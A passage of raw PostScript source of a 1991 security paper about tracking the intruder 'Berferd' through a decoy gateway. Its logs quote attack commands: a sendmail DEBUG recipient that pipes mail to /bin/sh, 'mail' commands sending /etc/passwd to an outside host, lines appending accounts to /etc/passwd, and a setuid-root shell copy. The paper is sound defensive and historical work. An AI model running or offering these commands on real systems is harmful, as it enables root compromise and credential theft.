(including)c(the)j(password)f(\256le.)18 b(The)12 b(cracker)h(can)f(also)f
(get)h(a)83 2563 y(list)e(of)g(hosts)h(trusted)f(by)g(this)g(machine)h(from)g
(the)g Fc(/etc/hosts.equiv)e Ff(and)i(various)f(personal)h
Fc(.rhosts)f Ff(\256les.)17 b(Our)83 2613 y(login)9 b(script)g(for)h(these)h
(accounts)f(look)g(something)f(like)h(this:)p eop
%%Page: 2 2
% Page 2 body.  Opens (in Fb, small Courier) with the decoy login script that
% the paper installs on guest/visitor accounts: it mails a notification to
% the authors, prints "/tmp full", and sleeps to stall the caller.  Then the
% remaining lure items (SMTP DEBUG, Finger, Rlogin/rsh), the paragraph on
% "reverse finger", the sample postmaster notification letter (again in Fb),
% and the discussion of how sites responded.  The strings are show() data
% for the printed paper, not executable shell text in this file.
bop 150 42 a Fb(exec)24 b(2>/dev/nu)q(ll)i(#)d(ensure)i(that)f(stderr)h
(doesn't)g(appear)150 81 y(trap)f("")f(1)150 120 y(/bin/echo)150
160 y(\()90 b(/bin/echo)26 b("Attempt)g(to)d(login)i(to)e(inet)h(with)47
b($LOGNAME)h(from)e($CALLER")26 b(|)441 199 y(upasname)q(=a)q(dm)g(/bin/mail)
g(ches)e(dangelo)h(&)262 239 y(#)e(\(notify)i(calling)h(machine's)g
(administra)q(to)q(r)g(for)d(some)h(machines)q(...)q(\))262
278 y(#)f(\(finger)i(the)f(calling)h(machine.)q(..\))150 318
y(\))e(2>&1)h(|)f(mail)h(ches)g(dangelo)150 396 y(/bin/echo)i("/tmp)f(full")
150 436 y(sleep)f(5)382 b(#)23 b(I)g(love)h(to)f(make)h(them)g(wait....)150
475 y(/bin/echo)i("/tmp)f(full")150 515 y(/bin/echo)h("/tmp)f(full")150
554 y(/bin/echo)150 594 y(sleep)f(60)360 b(#)23 b(...)g(and)h(simulatin)q(g)i
(a)d(busy)h(machine)h(is)e(useful)83 702 y Ff(W)m(e)10 b(have)h(to)e(be)h
(careful)h(that)e(the)h(caller)g(doesn')o(t)g(see)h(our)e(error)h(messages)i
(if)d(we)h(make)h(a)g(mistake)f(in)f(this)g(script.)15 b(Note)10
b(that)83 751 y Fc($CALLER)i Ff(is)g(the)g(name)i(or)e(IP)g(number)g(of)g
(the)g(machine)i(on)e(the)g(other)g(end.)21 b(It)12 b(is)g(available)g(to)g
(the)g(user)r(')n(s)g(environment)83 801 y(through)d(modi\256cations)g(to)h
(our)f Fe(telnetd)h Ff(and)g Fe(login)f Ff(programs.)42 884
y Fd(\017)20 b Fe(SMTP)11 b(DEBUG:)g Ff(This)f(command)i(used)f(to)f(provide)
f(a)i(couple)g(of)f(trap)g(doors)g(into)g Fe(sendmail)p Ff(.)15
b(All)10 b(the)g(vendors)g(seemed)j(to)83 934 y(clean)d(up)e(this)g(famous)h
(hole)g(quite)f(a)h(while)g(ago,)g(but)f(some)i(crackers)g(still)e(try)g(it)g
(occasionally)m(.)15 b(The)9 b(hole)g(allowed)f(outsiders)83
984 y(to)k(execute)i(a)f(shell)f(script)g(as)i Fc(root)p Ff(.)22
b(When)13 b(someone)g(tries)g(this)e(on)i(our)f(machine,)i(I)f(receive)h(the)
e(text)g(that)g(the)h(cracker)83 1034 y(wishes)d(to)g(have)h(executed.)42
1117 y Fd(\017)20 b Fe(Finger:)15 b(Finger)10 b Ff(provides)f(a)i(lot)e(of)h
(information)e(useful)i(to)f(crackers:)16 b(account)11 b(names,)g(when)f(the)
g(account)h(was)g(last)f(used,)83 1166 y(and)f(a)h(few)f(things)f(to)g(try)g
(as)i(passwords.)15 b(Since)9 b(our)g(corporate)g(policy)f(does)h(not)f
(allow)g(us)h(to)g(provide)f(this)g(information,)g(we)83 1216
y(put)i(in)h(a)h(service)g(that)e(rejects)i(the)f(call)g(after)h(\256ngering)
e(the)h(caller)n(.)18 b(\(Obviously)9 b(we)j(had)f(to)g(take)h(steps)f(to)g
(avoid)f(\256ngering)83 1266 y(loops)f(if)f(the)i(\256nger)f(came)i(from)e
(our)g(gateway)m(.\))16 b(It)9 b(turns)f(out)h(that)g(we)h(receive)g(about)f
(a)h(dozen)f(\256nger)h(requests)f(per)h(day)m(,)g(and)83 1316
y(they)i(are)h(mostly)e(legitimate.)21 b(W)m(e)12 b(now)g(print)f(useful)h
(information)e(for)i(general)h(queries,)g(but)e(mail)h(an)h(alarm)g(if)e
(someone)83 1366 y(wants)f(speci\256c)h(information)e(about)g(bogus)h
(accounts.)42 1449 y Fd(\017)20 b Fe(Rlogin/rsh:)12 b Ff(These)f(commands)f
(rely)e(on)h(a)g(notoriously)d(insecure)k(authentication)d(system,)j(which)e
(we)i(do)e(not)h(support.)k(But)83 1499 y(we)h(do)f(mail)h(reports)f(of)g
(attempts)g(to)g(use)h(them)g(along)f(with)f(reverse)j(\256nger)e
(information)f(and)i(particulars)f(like)f(the)i(user)83 1548
y(name)d(and)g(desired)f(command.)0 1649 y(Many)h(of)g(these)h(detectors)f
(perform)h(a)f(\252reverse)i Fe(\256nger)p Ff(\272)f(to)f(the)g(calling)f
(machine.)19 b(These)13 b Fe(\256nger)p Ff(s)e(can)i(often)d(locate)i(the)f
(calling)0 1699 y(user)g(on)e(a)i(busy)f(machine)h(after)f(several)h(probes,)
g(and)f(even)h(identify)d(the)j(previous)e(hop)h(on)f(a)i(laundered)f(call.)0
1767 y(When)h(a)f(probe)g(appears)h(to)f(have)h(no)f(legitimate)f(purpose,)h
(I)g(send)h(a)g(message)h(like)d(the)i(following:)150 1857
y Fb(inetfans)26 b(postmaster)q(@s)q(ds)q(u.e)q(du)150 1936
y(Yesterday)g(someone)f(from)g(math.sdsu.)q(ed)q(u)g(fetched)h(the)d
(/etc/pas)q(sw)q(d)i(file)150 1976 y(from)f(our)g(FTP)f(director)q(y.)48
b(The)24 b(file)g(is)f(not)h(important)q(,)i(but)d(these)i(probes)150
2015 y(are)f(sometimes)i(performed)g(from)e(stolen)h(accounts.)150
2094 y(Just)f(thought)h(you'd)g(like)f(to)f(know.)150 2173
y(Bill)h(Cheswick)0 2274 y Ff(This)11 b(is)h(a)g(typical)f(letter)n(.)18
b(It)11 b(is)g(sent)h(to)f(`inetfans')g(which)g(consists)g(of)g(the)g
(Computer)g(Emer)o(gency)i(Response)f(T)m(eam)h(\(CER)n(T\),)f(a)0
2323 y(log,)e(and)g(some)h(interested)f(parties,)g(plus)g(someone)h(who)f(is)
g(likely)f(to)g(care)j(at)e(the)g(of)o(fending)f(site.)0 2391
y(Many)h(system)h(administrators)e(take)i(these)g(reports)f(quite)g
(seriously)m(,)g(especially)g(the)h(military)e(sites.)16 b(Generally)m(,)10
b(system)h(admin-)0 2441 y(istrators)g(are)i(quite)e(cooperative)g(in)h
(hunting)e(down)h(these)i(problems.)20 b(Responses)12 b(to)f(these)i(letters)
e(included)g(apologies)h(\(some)0 2491 y(lengthy\),)7 b(bounced)h(messages,)j
(closed)d(accounts,)h(several)g(tighter)e(routers,)h(and)g(silence.)15
b(When)8 b(a)h(site)f(seems)i(willing)5 b(to)j(sponsor)0 2541
y(repeated)j(cracker)g(activity)e(we)i(consider)f(refusing)g(all)f(packets)i
(from)f(them.)p eop
%%Page: 3 3
% Page 3 body.  Section 2 "Unfriendly Acts": the smtpd log excerpt of 15 Jan
% 1991 (in Fb) showing a DEBUG session against the gateway's mail daemon,
% the paper's explanation of that log, the two logged "mail adrian@..."
% probes for the password file, and the exchange with Stanford.  The \303
% escapes inside the log strings reproduce the control characters the
% remote side typed; they are part of the printed transcript and are
% show() data only.
bop 0 42 a Fg(2.)21 b(Unfriendly)10 b(Acts)83 137 y Ff(W)m(e've)k(been)g
(running)d(this)i(setup)g(since)h(July)f(1990.)24 b(Probe)13
b(rates)h(go)f(up)g(during)f(college)h(vacations.)25 b(Our)13
b(rate)h(may)g(be)0 187 y(higher)9 b(than)h(most,)h(because)h(we)e(are)h
(well-known)e(and)h(considered)h(by)e(some)i(to)f(be)h(\252The)g(Phone)f
(Company)m(.\272)0 255 y(When)d(a)h(caller)g(fetches)g(the)f
Fc(passwd)f Ff(\256le)i(during)e(a)h(long)f(session,)j(it)d(is)h(not)f
(always)i(clear)g(that)f(he)g(has)h(evil)e(intentions.)12 b(Sometimes)0
304 y(they)e(are)h(just)e(checking)i(to)e(see)j(if)d(any)i(transfer)f(will)f
(work.)0 372 y(The)i(following)d(log,)i(from)g(15)g(Jan)g(1991,)g(shows)g
(decidedly)g(unfriendly)e(activity:)150 463 y Fb(19:43:10)26
b(smtpd[2746)q(6])q(:)g(<---)e(220)f(inet.att)q(.co)q(m)j(SMTP)150
502 y(19:43:14)g(smtpd[2746)q(6])q(:)g(------->)f(debug)150
541 y(19:43:14)h(smtpd[2746)q(6])q(:)g(DEBUG)e(attempt)150
581 y(19:43:14)i(smtpd[2746)q(6])q(:)g(<---)e(200)f(OK)150
620 y(19:43:25)j(smtpd[2746)q(6])q(:)g(------->)f(mail)f(from:</d)q(ev)q(/nu)
q(ll)q(>)150 660 y(19:43:25)i(smtpd[2746)q(6])q(:)g(<---)e(503)f(Expectin)q
(g)i(HELO)150 699 y(19:43:34)h(smtpd[2746)q(6])q(:)g(------->)f(helo)150
739 y(19:43:34)h(smtpd[2746)q(6])q(:)g(HELO)e(from)150 778
y(19:43:34)i(smtpd[2746)q(6])q(:)g(<---)e(250)f(inet.att)q(.co)q(m)150
818 y(19:43:42)j(smtpd[2746)q(6])q(:)g(------->)f(mail)f(from:)h(</dev/nul)q
(l>)150 857 y(19:43:42)h(smtpd[2746)q(6])q(:)g(<---)e(250)f(OK)150
896 y(19:43:59)j(smtpd[2746)q(6])q(:)g(------->)f(rcpt)f(to:</dev)q(/\303)q
(H\303H)q(\303H)q(\303H\303)q(H\303)q(H\303)q(H\303H)q(\303H)q(\303H\303)q
(H\303)q(H\303)q(H\303H)q(\303H)q(\303H\303)q(H)150 936 y(19:43:59)i
(smtpd[2746)q(6])q(:)g(<---)e(501)f(Syntax)i(error)g(in)e(recipient)j(name)
150 975 y(19:44:44)g(smtpd[2746)q(6])q(:)g(------->)f(rcpt)f(to:<|sed)i(-e)d
('1,/\303$/')q(d)j(|)c(/bin/sh)k(;)d(exit)h(0">)150 1015 y(19:44:44)i
(smtpd[2746)q(6])q(:)g(shell)e(character)q(s:)i(|sed)e(-e)f('1,/\303$/')q(d)j
(|)c(/bin/sh)k(;)d(exit)h(0")150 1054 y(19:44:45)i(smtpd[2746)q(6])q(:)g
(<---)e(250)f(OK)150 1094 y(19:44:48)j(smtpd[2746)q(6])q(:)g(------->)f(data)
150 1133 y(19:44:48)h(smtpd[2746)q(6])q(:)g(<---)e(354)f(Start)i(mail)f
(input;)h(end)e(with)i(<CRLF>.<CR)q(LF)q(>)150 1172 y(19:45:04)h(smtpd[2746)q
(6])q(:)g(<---)e(250)f(OK)150 1212 y(19:45:04)j(smtpd[2746)q(6])q(:)g
(/dev/null)48 b(sent)24 b(48)f(bytes)i(to)46 b(upas.secur)q(it)q(y)150
1251 y(19:45:08)26 b(smtpd[2746)q(6])q(:)g(------->)f(quit)150
1291 y(19:45:08)h(smtpd[2746)q(6])q(:)g(<---)e(221)f(inet.att)q(.co)q(m)j
(Terminatin)q(g)150 1330 y(19:45:08)g(smtpd[2746)q(6])q(:)g(finished.)0
1431 y Ff(This)11 b(is)g(our)f(log)h(of)f(an)i(SMTP)f(session.)18
b(These)12 b(arcane)h(sessions)e(are)h(usually)e(carried)h(out)f(between)i
(two)e(mailers.)18 b(In)11 b(this)f(case,)0 1481 y(there)h(was)g(a)g(human)f
(at)h(the)f(other)g(end)g(typing)f(\(and)h(mistyping\))f(commands)i(to)f(our)
g(mail)g(demon.)16 b(The)11 b(\256rst)f(thing)f(he)i(tried)e(was)0
1531 y(the)i Fc(debug)f Ff(command.)19 b(He)11 b(must)g(have)h(been)f
(surprised)f(when)h(he)h(got)e(the)h(\252)p Fc(250)25 b(OK)p
Ff(\272)11 b(response.)18 b(The)11 b(key)g(line)g(is)g(the)f
Fc(rcpt)0 1581 y(to:)17 b Ff(command)c(entered)e(at)h(19:44:44.)17
b(The)12 b(text)f(within)f(the)h(angled)h(brackets)g(of)f(this)f(command)j
(is)e(usually)g(the)g(address)h(of)g(a)0 1630 y(mail)f(recipient.)17
b(Here)12 b(it)e(contains)h(a)g(command)h(line.)18 b Fe(Sendmail)9
b Ff(used)j(to)e(execute)i(this)e(command)i(line)f(as)g(root)g(when)g(it)f
(was)i(in)0 1680 y(debug)e(mode.)15 b(The)c(text)f(of)g(the)g(actual)h(mail)f
(message)i(\(not)d(logged\))g(is)h(piped)g(through)150 1771
y Fb(sed)24 b(-e)f('1,/\303$/'d)j(|)d(/bin/sh)i(;)e(exit)h(0")0
1872 y Ff(which)10 b(strips)g(of)o(f)h(the)f(mail)h(headers)h(and)f(executes)
h(the)e(rest)h(of)g(the)f(message)j(as)e(root.)16 b(The)11
b(text)g(of)f(the)h(message)h(was)g(mailed)f(to)0 1921 y(me.)16
b(Here)11 b(were)g(two)f(of)g(these)g(probes)g(as)h(I)g(logged)e(them,)i
(including)d(a)j(time)f(stamp:)150 2012 y Fb(19:45)92 b(mail)24
b(adrian@em)q(bez)q(zl)q(e.s)q(ta)q(nf)q(ord)q(.e)q(du)i(</etc/pas)q(swd)150
2051 y(19:51)92 b(mail)24 b(adrian@em)q(bez)q(zl)q(e.s)q(ta)q(nf)q(ord)q(.e)q
(du)i(</etc/pas)q(swd)0 2152 y Ff(He)13 b(wanted)g(us)g(to)g(mail)g(him)f(a)i
(copy)f(of)f(our)h(password)g(\256le,)h(presumably)e(to)h(run)f(it)g(through)
g(a)h(password)g(cracking)g(program.)0 2202 y(Each)g(of)e(these)h(probes)f
(came)i(from)e(a)h(user)g Fc(adrian)f Ff(on)g Fa(EMBEZZLE)p
Ff(.)p Fa(ST)m(ANFORD)p Ff(.)q Fa(EDU)p Ff(.)22 b(They)12 b(were)g(overtly)e
(hostile,)h(and)g(came)0 2252 y(within)f(half)h(an)h(hour)f(of)g(the)g
(announcement)h(of)f(U.S.)i(air)e(raids)g(on)h(Iraq.)19 b(I)11
b(idly)f(wondered)i(if)f(Saddam)h(had)g(hired)f(a)h(cracker)g(or)0
2302 y(two.)i(I)c(happened)g(to)f(have)h(the)g(spare)g(bogus)f(passwd)h
(\256le)g(in)f(the)g(FTP)i(directory)m(,)e(so)h(I)f(mailed)h(that)f(to)g(him)
h(with)e(a)j(return)e(address)0 2351 y(of)h Fc(root)p Ff(.)15
b(I)10 b(also)g(sent)h(the)f(usual)g(letter)f(to)h(Stanford.)0
2419 y(The)g(next)f(morning)f(I)h(heard)h(from)f(the)g(folks)g(at)g
(Stanford:)k(they)c(knew)h(about)e(it,)h(and)h(were)g(working)e(on)h(the)g
(problem.)14 b(They)c(also)0 2469 y(said)g(that)g(the)g(account)g
Fc(adrian)g Ff(had)h(been)f(stolen.)p eop
%%Page: 4 4
bop 0 42 a Ff(The)11 b(following)d(Sunday)i(morning)f(I)h(received)h(a)g
(letter)e(from)h(France:)150 128 y Fb(To:)24 b(root@resea)q(rc)q(h.a)q(tt)q
(.c)q(om)150 167 y(Subject:)i(intruder)150 206 y(Date:)e(Sun,)h(20)e(Jan)g
(91)h(15:02:53)h(+0100)150 285 y(I)e(have)46 b(just)24 b(closed)h(an)f
(account)h(on)e(my)g(machine)150 325 y(which)h(has)g(been)g(broken)h(by)e(an)
h(intruder)h(coming)g(from)f(embezzle)q(.s)q(tan)q(fo)q(rd.)q(ed)q(u.)i(He)
150 364 y(\(she\))e(has)g(left)g(a)f(file)h(called)h(passwd.)g(The)f
(contents)i(are:)150 443 y(---------)q(--)q(-)150 482 y(>From)e(root@res)q
(ea)q(rch)q(.a)q(tt)q(.co)q(m)i(Tue)d(Jan)h(15)f(18:49:13)j(1991)150
522 y(Received:)g(from)e(research)q(.at)q(t.)q(com)i(by)e(embezzle.S)q(ta)q
(nfo)q(rd)q(.ED)q(U)i(\(5.61/4.7\))q(;)150 561 y(Tue,)e(15)f(Jan)h(91)f
(18:49:12)j(-0800)150 601 y(Message-I)q(d:)g(<91011602)q(49)q(.AA)q(26)q(092)
q(@e)q(mb)q(ezz)q(le)q(.St)q(an)q(fo)q(rd.)q(ED)q(U>)150 640
y(From:)e(root@res)q(ea)q(rch)q(.a)q(tt)q(.co)q(m)150 680 y(Date:)g(Tue,)h
(15)e(Jan)g(91)h(21:48)g(EST)150 719 y(To:)g(adrian@emb)q(ez)q(zle)q(.s)q(ta)
q(nfo)q(rd)q(.ed)q(u)150 759 y(Root:)g(mgajqD9n)q(OA)q(VDw)q(:0)q(:2)q(:00)q
(00)q(-Ad)q(mi)q(n\()q(000)q(0\))q(:/:)150 798 y(Daemon:)h(*:1:1:00)q(00-)q
(Ad)q(mi)q(n\(0)q(00)q(0\):)q(/:)150 837 y(Bin:)f(*:2:2:000)q(0-)q(Adm)q(in)q
(\(0)q(000)q(\):)q(/bi)q(n:)150 877 y(Sys:)g(*:3:3:000)q(0-)q(Adm)q(in)q(\(0)
q(000)q(\):)q(/us)q(r/)q(v9)q(/sr)q(c:)150 916 y(Adm:)g(*:4:4:000)q(0-)q(Adm)
q(in)q(\(0)q(000)q(\):)q(/us)q(r/)q(ad)q(m:)150 956 y(Uucp:)g(*:5:5:00)q(00)q
(-uu)q(cp)q(\(0)q(000)q(\):)q(/us)q(r/)q(li)q(b/u)q(uc)q(p:)150
995 y(Nuucp:)h(*:10:10:0)q(000)q(-u)q(uc)q(p\(0)q(00)q(0\):)q(/u)q(sr)q(/sp)q
(oo)q(l/u)q(uc)q(pp)q(ubl)q(ic)q(:/u)q(sr)q(/l)q(ib/)q(uu)q(cp/)q(uu)q(ci)q
(co)150 1035 y(Ftp:)f(anonymous)q(:7)q(1:1)q(4:)q(fi)q(le)i(transfer:)q(/:n)q
(o)g(soap)150 1074 y(Ches:)e(j2PPWsiV)q(al)q(..Q)q(:2)q(00)q(:1:)q(me)q(:/u)q
(/c)q(he)q(s:/)q(bi)q(n/s)q(h)150 1113 y(Dmr:)g(a98tVGlT7)q(Gi)q(aM:)q(20)q
(2:)q(1:D)q(en)q(nis)q(:/)q(u/)q(dmr)q(:/)q(bin)q(/s)q(h)150
1153 y(Rtm:)g(5bHD/k5k2)q(mT)q(Ts:)q(20)q(3:)q(1:R)q(ob)q(:/u)q(/r)q(tm)q
(:/b)q(in)q(/sh)150 1192 y(Berferd:)i(deJCw4bQcN)q(T3)q(Y:)q(204)q(:1)q(:Fr)q
(ed)q(:/)q(u/b)q(er)q(fer)q(d:)q(/b)q(in/)q(sh)150 1232 y(Td:)e(PXJ.d9CgZ9)q
(Dm)q(A:2)q(06)q(:1)q(:To)q(m:)q(/u/)q(td)q(:/)q(bin)q(/s)q(h)150
1271 y(Status:)h(R)150 1311 y(---------)q(--)q(-)150 1390 y(Please)g(let)f
(me)f(know)h(if)f(you)h(heard)g(of)g(him.)0 1486 y Ff(My)10
b(bogus)g(password)g(\256le)h(had)f(traveled)g(to)g(France!)16
b(A)10 b(con\256guration)f(error)h(caused)i(our)d(mailer)i(to)f(identify)e
(the)i(password)h(text)0 1536 y(as)g(RFC)e(822)h(header)h(lines,)f(and)g
(carefully)f(adjusted)h(the)g(format)g(accordingly)m(.)k(The)d(\256rst)f
(letter)f(was)i(capitalized,)f(and)g(there)g(was)0 1586 y(a)h(space)g(added)g
(after)f(the)g(\256rst)g(colon)g(on)g(each)h(line.)0 1717 y
Fg(3.)21 b(An)10 b(Evening)g(with)g(Berferd)83 1813 y Ff(On)h(Sunday)f
(evening,)h(January)g(20,)g(I)g(was)h(riveted)e(to)g(CNN)h(like)f(most)h
(people.)17 b(A)11 b(CNN)f(bureau)h(chief)g(in)f(Jerusalem)i(was)0
1863 y(casting)e(about)g(for)f(a)i(gas)g(mask.)16 b(I)10 b(was)h(quite)e
(annoyed)h(when)h(my)f(terminal)g(announced)g(a)h(security)f(event:)150
1949 y Fb(22:33)114 b(finger)25 b(attempt)g(on)f(berferd)0
2045 y Ff(A)9 b(couple)f(of)h(minutes)f(later)h(someone)h(used)f(the)f
Fc(debug)h Ff(command)g(to)g(submit)f(commands)h(to)g(be)g(executed)g(as)h
(root\320he)d(wanted)0 2095 y(our)j(mailer)g(to)g(change)h(our)e(password)i
(\256le!)150 2181 y Fb(22:36)114 b(echo)24 b("beferdd)q(::3)q(00)q(:1:)q(ma)q
(yb)q(e)h(Beferd:/)q(:/)q(bin)q(/s)q(h")h(>>/etc/pa)q(ssw)q(d)374
2221 y(cp)d(/bin/sh)j(/tmp/shell)374 2260 y(chmod)f(4755)f(/tmp/shell)0
2356 y Ff(Again,)10 b(the)g(connection)g(came)i(from)e Fa(EMBEZZLE)p
Ff(.)p Fa(ST)m(ANFORD)p Ff(.)q Fa(EDU)p Ff(.)0 2424 y(What)i(should)e(I)h
(do?)19 b(I)11 b(didn')o(t)f(want)h(to)g(actually)g(give)g(him)h(an)f
(account)h(on)f(our)g(gateway)m(.)20 b(Why)11 b(invite)f(trouble?)18
b(I)11 b(would)g(have)0 2474 y(no)f(keystroke)g(logs)f(of)h(his)g(activity)m
(,)g(and)g(would)f(have)i(to)f(clean)g(up)g(the)g(whole)g(mess)i(later)n(.)0
2542 y(I'd)h(like)f(to)h(string)f(him)h(along)g(a)g(little)f(to)h(see)h(what)
f(other)g(things)f(he)h(had)g(in)g(mind.)24 b(Perhaps)14 b(I)f(could)f
(emulate)i(the)f(operating)0 2591 y(system)f(by)f(hand.)20
b(This)11 b(means)i(that)e(I'd)g(have)h(to)g(teach)g(him)f(that)g(the)h
(machine)g(is)g(slow)m(,)g(because)h(I)f(am)g(no)f(match)i(for)e(a)h(MIPS)0
2641 y(M/120.)k(It)10 b(also)h(meant)g(that)f(I)h(would)f(have)h(to)f(create)
j(a)e(somewhat)g(consistent)f(simulated)g(system,)i(based)g(on)e(some)i
(decisions)e(I)0 2691 y(made)h(up)f(as)h(I)f(went)g(along.)15
b(I)10 b(already)h(had)f(one)g(Decision,)h(because)g(he)g(had)f(received)h(a)
g(password)f(\256le:)p eop
%%Page: 5 5
bop 83 42 a Fg(Decision)10 b(1)21 b Fe(Ftp')-5 b(s)9 b(passwor)n(d)h(\256le)h
(was)f(the)g(r)n(eal)g(one.)0 148 y Ff(Here)h(were)g(a)g(couple)f(more:)83
254 y Fg(Decision)g(2)21 b Fe(The)12 b(gateway)f(machine)g(is)g(poorly)g
(administer)n(ed.)19 b(\(After)11 b(all,)h(it)e(had)h(the)h(DEBUG)g(hole,)g
(and)f(the)g(FTP)83 304 y(dir)n(ectory)g(should)e(never)j(contain)d(a)h(r)n
(eal)g(passwor)n(d)g(\256le.\))83 409 y Fg(Decision)g(3)21
b Fe(The)7 b(gateway)g(machine)g(is)g(t)o(erribly)g(slo)o(w)m(.)k(It)c(could)
g(take)g Ff(hours)f Fe(for)g(mai)o(l)h(t)o(o)f(get)h(t)o(hr)n(ough\320)o
(even)g(overnight!)0 515 y Ff(So)k(I)h(wanted)f(him)h(to)e(think)g(he)i(had)g
(changed)g(our)f(password)g(\256le,)h(but)f(didn')o(t)f(want)h(to)g(actually)
g(let)g(him)h(log)e(in.)19 b(I)11 b(could)g(create)0 565 y(an)g(account,)f
(but)g(make)h(it)f(inoperable.)k(How?)83 671 y Fg(Decision)c(4)21
b Fe(The)10 b(shell)g(doesn')-5 b(t)10 b(r)n(eside)i(in)d Fc(/bin)p
Fe(,)i(it)e(r)n(esides)i(somewher)n(e)h(else.)0 778 y Ff(This)d(decision)f
(was)i(pretty)e(silly)m(,)g(but)g(I)h(had)g(nothing)e(to)h(lose.)15
b(I)8 b(whipped)g(up)h(a)g(test)g(account)g Fc(b)g Ff(with)f(a)h(little)e
(shell)i(script.)14 b(It)8 b(would)0 828 y(send)i(me)i(mail)e(when)g(it)g
(was)g(called,)h(and)g(had)f(some)h(sleeps)g(in)e(it)h(to)g(slow)f(it)h
(down.)k(The)d(caller)g(would)e(see)i(this:)150 916 y Fb(RISC/os)25
b(\(inet\))150 995 y(login:)g(b)150 1034 y(RISC/os)g(\(UMIPS\))h(4.0)d(inet)
150 1074 y(Copyright)j(1986,)f(MIPS)f(Computer)h(Systems)150
1113 y(All)f(Rights)h(Reserved)150 1231 y(Shell)f(not)g(found)0
1330 y Ff(Decision)9 b(3)g(explained)g(why)g(it)g(took)f(about)h(ten)g
(minutes)g(for)g(the)g(addition)f(to)g(the)i(password)f(\256le.)15
b(I)9 b(changed)h(the)f Fc(b)h Ff(to)f Fc(beferdd)0 1380 y
Ff(in)h(the)g(real)g(password)h(\256le.)k(While)10 b(I)g(was)h(setting)e
(this)g(up)h(he)h(tried)e(again:)150 1468 y Fb(22:41)114 b(echo)24
b("bferd)h(::301:1::)q(/:)q(/b)q(in/)q(sh)q(")g(>>)f(/etc/passw)q(d)0
1567 y Ff(Here')n(s)10 b(another)f(proposed)g(addition)f(to)h(our)h(password)
f(\256le.)15 b(He)c(must)e(have)h(put)f(the)h(space)h(in)e(after)h(the)f
(login)f(name)j(because)g(the)0 1617 y(previous)f(command)h(hadn')o(t)f(been)
h(\252executed\272)g(yet,)g(and)g(he)f(remembered)i(the)f(RFC)f(822)f(space)j
(in)e(the)g(\256le)h(we)g(sent)f(him.)16 b(Quite)0 1666 y(a)11
b(\257exible)f(fellow)m(,)g(actually)m(.)15 b(He)c(got)e(impatient)g(while)h
(I)g(installed)f(the)h(new)h(account:)150 1755 y Fb(22:45)114
b(talk)24 b(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(d\303H)q(fo)q(rd.)q(ed)q(u)
374 1794 y(talk)g(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(for)q(d.)q(edu)83
1901 y Fg(Decision)10 b(5)21 b Fe(W)l(e)10 b(don')-5 b(t)10
b(have)h(a)f Ff(talk)f Fe(command.)83 2005 y Fg(Decision)h(6)21
b Fe(Err)n(ors)11 b(ar)n(e)g(not)f(r)n(eported)g(to)g(the)g(invader)g(when)g
(the)g(DEBUG)h(hole)e(is)h(used.)16 b(\(I)10 b(assume)g(this)f(is)h(actually)
83 2055 y(true)k(anyway)n(.\))25 b(Also,)15 b(any)f(err)n(oneous)g(commands)g
(will)e(abort)h(the)g(script)h(and)f(pr)n(event)i(the)e(pr)n(ocessing)h(of)g
(further)83 2105 y(commands)c(in)g(the)g(same)g(script.)0 2211
y Ff(The)i Fe(talk)f Ff(request)g(had)g(come)i(from)e(a)g(dif)o(ferent)g
(machine)h(at)f(Stanford.)18 b(I)11 b(noti\256ed)f(them)i(in)e(case)j(they)e
(didn')o(t)f(know)m(.)18 b(I)11 b(checked)0 2261 y(for)f(Scuds)g(on)g(the)g
(TV)-5 b(.)0 2329 y(He)12 b(had)f(chosen)h(to)e(attack)i(the)f
Fc(berferd)g Ff(account.)18 b(This)12 b(name)g(came)h(from)e(the)g(old)f
(Dick)i(V)-5 b(an)11 b(Dyke)h(show)f(when)g(Jerry)g(V)-5 b(an)0
2379 y(Dyke)10 b(called)h(Dick)f(\252Berferd\272)h(\252because)h(he)f(looked)
e(like)h(one.\272)15 b(It)10 b(seemed)i(like)e(a)g(good)g(name)h(for)f(our)g
(cracker)n(.)0 2446 y(There)h(was)g(a)g(\257urry)f(of)f(new)i(probes.)k(I)10
b(guess)h(Berferd)f(didn')o(t)f(have)i(cable)g(TV)-5 b(.)150
2535 y Fb(22:48)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bferd)h(from)f(Tip-Quad)q(A.)q(Sta)q(nf)q(or)q(d.E)q(DU)150
2574 y(22:48)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bferd)h(from)f(Tip-Quad)q(A.)q(Sta)q(nf)q(or)q(d.E)q(DU)150
2613 y(22:49)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bferd)h(from)f(embezzle)q(.S)q(tan)q(fo)q(rd)q(.ED)q(U)150
2653 y(22:51)114 b(\(Notified)26 b(Stanford)g(of)d(the)h(use)g(of)f
(Tip-QuadA)q(.St)q(an)q(fo)q(rd.)q(ED)q(U\))150 2692 y(22:51)114
b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bferd)h(from)f(embezzle)q
(.S)q(tan)q(fo)q(rd)q(.ED)q(U)p eop
%%Page: 6 6
bop 150 42 a Fb(22:51)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bferd)h(from)f(embezzle)q(.S)q(tan)q(fo)q(rd)q(.ED)q(U)150
81 y(22:55)114 b(echo)24 b("bfrd)h(::303:1::/)q(tm)q(p:)q(/bi)q(n/)q(sh")h
(>>)e(/etc/passw)q(d)150 120 y(22:57)114 b(\(Added)25 b(bfrd)f(to)f(the)h
(real)g(password)i(file.\))150 160 y(22:58)114 b(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)
q(d.)q(EDU)150 199 y(22:58)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)
46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
239 y(23:05)114 b(echo)24 b("36.92.0)q(.20)q(5")i(>/dev/nul)q(l)374
278 y(echo)e("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q(rd.)q(ed)q
(u">)q(>/)q(et)q(c./)q(\303H)q(\303H\303)q(H)150 318 y(23:06)f(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(guest)h(from)f(rice-che)q(x.)q(ai.)q(mi)
q(t.)q(edu)150 357 y(23:06)114 b(echo)24 b("36.92.0)q(.20)q(5)115
b(embezzle)q(.st)q(an)q(fo)q(rd.)q(ed)q(u")26 b(>>)d(/etc/host)q(s)150
